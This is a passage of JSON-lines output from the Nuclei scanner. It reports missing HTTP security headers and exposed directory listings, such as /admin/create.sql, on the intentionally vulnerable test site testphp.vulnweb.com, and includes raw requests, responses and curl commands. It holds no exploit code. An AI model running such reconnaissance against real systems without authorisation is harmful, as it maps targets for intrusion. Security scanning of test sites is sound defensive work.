'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.521813179Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.5637312Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.655744449Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.655803796Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.894599596Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.936939948Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.511706567Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:34.913115139Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:35.519972749Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:35.939055311Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 